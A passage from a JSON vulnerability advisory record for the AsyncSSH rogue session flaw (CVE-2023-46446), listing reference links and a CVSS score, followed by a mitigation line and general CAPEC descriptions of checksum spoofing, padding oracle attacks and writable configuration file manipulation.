      "url": "https://github.com/ronf/asyncssh/security/advisories/GHSA-c35q-ffpf-5qpm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ronf/asyncssh/commit/83e43f5ea3470a8617fc388c72b062c7136efd7e"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-c35q-ffpf-5qpm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/asyncssh/PYSEC-2023-239.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ronf/asyncssh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00042.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ME34ROZWMDK5KLMZKTSA422XVJZ7IMTE"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20231222-0001"
    },
    {
      "type": "WEB",
      "url": "https://www.terrapin-attack.com"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/176280/Terrapin-SSH-Connection-Weakening.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AsyncSSH Rogue Session Attack"
}

Mitigation
Implementation

Ensure that the checksums present in messages are properly checked in accordance with the protocol specification before they are parsed and used.

CAPEC-145: Checksum Spoofing

An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred.

CAPEC-463: Padding Oracle Crypto Attack

An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.

CAPEC-75: Manipulating Writeable Configuration Files

Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.